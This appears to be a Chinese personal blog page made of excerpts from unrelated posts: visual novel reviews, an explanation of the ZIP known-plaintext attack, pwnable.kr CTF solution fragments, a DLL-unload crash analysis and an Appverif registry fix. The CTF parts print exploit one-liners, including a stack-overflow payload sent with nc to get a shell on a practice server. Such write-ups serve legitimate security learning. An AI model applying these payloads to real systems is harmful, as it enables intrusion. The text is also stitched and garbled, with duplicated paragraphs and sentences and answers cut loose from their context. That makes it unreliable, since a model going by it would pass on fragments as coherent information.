非常短小精悍的剧本,没有什么注水剧情反而比较讨喜。大概花 10 小时就能走完全部剧情。
整体上是由 BE 铺出的 TE 之路,通过不断解锁 BE 后最终达到真路线。实际在玩的过程中路线是以单一方式解锁的,另外系统自带了剧本的流程图,所处的分支也一目了然。一开始我以为剧本和选项里会带有推理情节,剧本前段还提到了男主有特殊能力。但后面发现基本没有推理要素。
非常短小精悍的剧本,没有什么注水剧情反而比较讨喜。大概花 10 小时就能走完全部剧情。
整体上是由 BE 铺出的 TE 之路,通过不断解锁 BE 后最终达到真路线。实际在玩的过程中路线是以单一方式解锁的,另外系统自带了剧本的流程图,所处的分支也一目了然。一开始我以为剧本和选项里会带有推理情节,剧本前段还提到了男主有特殊能力。但后面发现基本没有推理要素。
七耀历 1204 年春,托尔茲军官学院诞生了一个全新的班级特科班《七班》,其成员是和最先进的战术导力器 ARCUS 有着高契合度的 9 个学生。刚入学他们就碰上了一场实战考验。在协力通过考验后,全员怀着自己的抱负表示留下。
黎恩·舒华泽 地方贵族之子
亚莉莎·莱恩福尔特 帝国最大重工企业的大小姐
艾略特·克雷格 想成为音乐家的正太
劳拉·S·亚尔赛德 武术名门之女
马奇亚斯·雷格尼兹 帝都首长儿子
艾玛·米尔斯汀 入学成绩位居榜首的七班班长
尤西斯·艾尔巴雷亚 名门贵族《四大名门》的次子
菲·克劳赛尔 猫系少女
盖乌斯·沃泽尔 高大的留学生
莎拉·巴雷斯坦 级任教官
学院生活由好几个模式组成。
三月第一次到凯尔迪克,那里有个远近闻名的大市集。实习过程中大市集发生了不明盗窃事件,七班为了解决它开始调查,并最终在露纳利亚自然公园里找到了失窃的物资。然而这时他们却被赶来的当地领邦军包围。随后克蕾雅上尉带领铁路宪兵队(简称 TMP)前来救场,最后结束实习返回。
在看 CTF 时发现了 zip 明文攻击的攻击方式,然而举的例子里基本都是使用工具——也就是 ARCHPR 简单完成破解,转而进行下一步操作,对明文攻击本身并没有做更多解释。本想看看 ARCHPR 的明文攻击实现的,结果发现这东西是商业软件……于是开始找其他资料。
简单搜了一圈发现这种攻击是基于 Biham 和 Kocher 在 94 年发表的论文《A Known Plaintext Attack on the PKZIP Stream Cipher》实现的。
明文攻击主要利用大于 12 字节的一段已知明文数据进行攻击,从而获取整个加密文档的数据。也就是说,如果我手里有一个未知密码的压缩包和压缩包内某个文件的一部分明文(不一定非要从头开始,能确定偏移就行),那么我就可以通过这种攻击来解开整个压缩包。比如压缩包里有一个常见的 license 文件,或者是某个常用的 dll 库,或者是带有固定头部的文件(比如 xml、exe、png 等容易推导出原始内容的文件),那么就可以运用这种攻击。当然,前提是压缩包要用 ZipCrypto 加密。
关键在于 pc 的计算。不像 x86 里 pc 总是指向下一条指令的地址,ARM 中的 pc 是下下条。假设当前指令地址为 x,即
按这个规则计算得到 key1() + key2() + key3() = 0x8ce4 + 0x8d0c + 0x8d80 = 0x1A770,输入就好了
108400
因为运算符优先级问题,fd 被赋值成 0,也就是 stdin,和 password 文件就没有关系了,可以输入
1111111111 0000000000
./col "$(python -c 'from struct import pack;print "0"*16 + pack("<I", 0x611c492c)')"
一开始不熟悉输入处理,花了不少时间……echo 后面追加 cat 可以使输入流关闭,成功获得 shell。(PS:一开始拿到了 shell 还不自知……)不加 cat 的话则会提示 *** stack smashing detected ***: terminated
(echo "$(python -c 'from struct import pack;print "A"*52 + pack("<I", 0xcafebabe)')";cat) | nc pwnable.kr 9000
之前没玩过老吴的作品,玩了才知道老吴爱整鬼片。上来先发了一整个序章的糖。正当我想着圆香这么牛皮,其他女主要怎么和她竞争的时候,小圆直接领便当走了……辣手摧花毫不犹豫。OP 放完我还没缓过来时,小圆已经变成慎司脑内专属灵体女友了。
最近测试时发现代码中一处关于 std::function 函数对象的问题。在卸载某个 Dll(记为 A)的时候会触发该模块中一个单例对象的析构,在它析构内部的 std::function 成员时产生了内存访问异常(0xc0000005)。而触发这个异常的 std::function 其实是复制于另一个 Dll(记为 B),卸载 Dll A 时,Dll B 已经卸载掉了。
此时调用它关联的函数会抛异常容易理解,但这时并没有进行调用操作。原因在于函数对象析构时会调用关联的 _Delete_this 方法释放资源,而这个函数一般定义在 std 的 _Func_impl / _Func_impl_no_alloc 模板类中。所以当实例化 function 时对应删除函数的代码也是属于当前模块里的(也就是 Dll B)。现在 Dll B 已经卸载,那么只要有任何触发相关代码执行的操作都会引发异常。
巨乳村是 minori 回血之路的第一作,剧本还残留着不少原风格的味道,可以拿来品味下(反正剧本也短,而且感觉也挺实用)
这一作的主题围绕着痛苦、拯救来展开。简介就不贴了,就是主角兄妹身怀转移他人痛苦的异能,为了摆脱被各种人利用的生活兄妹俩就躲到了远方亲戚所在的巨乳村里。然后在这个夏天和女孩子们发生了这样的那样的事情。
要是时间充足这个题材也可以继续写更多东西出来,什么人性的善恶啊,温柔与坚强啊,正面的反面的都行。像妹妹线和透香线都可以继续展开,只不过剧本并没有像她们的奶子那样饱满。
最近发现 Appverif 打不开了,公司不少同事的电脑上也遇到这个问题。
涉事的 appverif 版本是: 10.0.18362.1
win 10 的版本是 20H2(19042.867)
主要现象就是启动 appverif.exe 时命令行窗口一闪而过,UI 窗口没有创建就退出了。
用 windbg 调了一下,发现 appverif 在初始化 UI 窗口前会去检查并登记注册表 Image File Execution Options 键值下的 exe,而当遍历到其中的 MsSense.exe 时因为没有权限失败了(STATUS_ACCESS_DENIED)
具体堆栈如下:
00 vrfcore!VfCoreOpenImageFileExecutionOptionsKey+0xc4
01 vrfcore!VerifierOpenLayerProperties+0x4b
02 appverifUI!AppVerif::GetVerifiedImages+0xd6
03 appverifUI!StartUI+0x64
04 appverif!wWinMain+0x43e
05 appverif!__wmainCRTStartup+0x153
06 KERNEL32!BaseThreadInitThunk+0x19
07 ntdll!__RtlUserThreadStart+0x2f
08 ntdll!_RtlUserThreadStart+0x1b
VfCoreOpenImageFileExecutionOptionsKey 中会调用 NtOpenKey 打开每个项,而轮到 MsSense.exe 时因为返回 STATUS_ACCESS_DENIED 而导致初始化过程失败,进程退出。
用注册表编辑器打开一看 admin 确实是没有访问权限,那么给它加上就可以了。
可以用 NSudo 启动一个注册表编辑器,给 MsSense.exe 手动加上管理员组的读取权限,这样 Appverif 就恢复正常了。
当然,新的 Appverif 已经修复了这个问题,直接更新到最新版就没问题了。
Copyright © 2025 Re: Memory. Powered by love.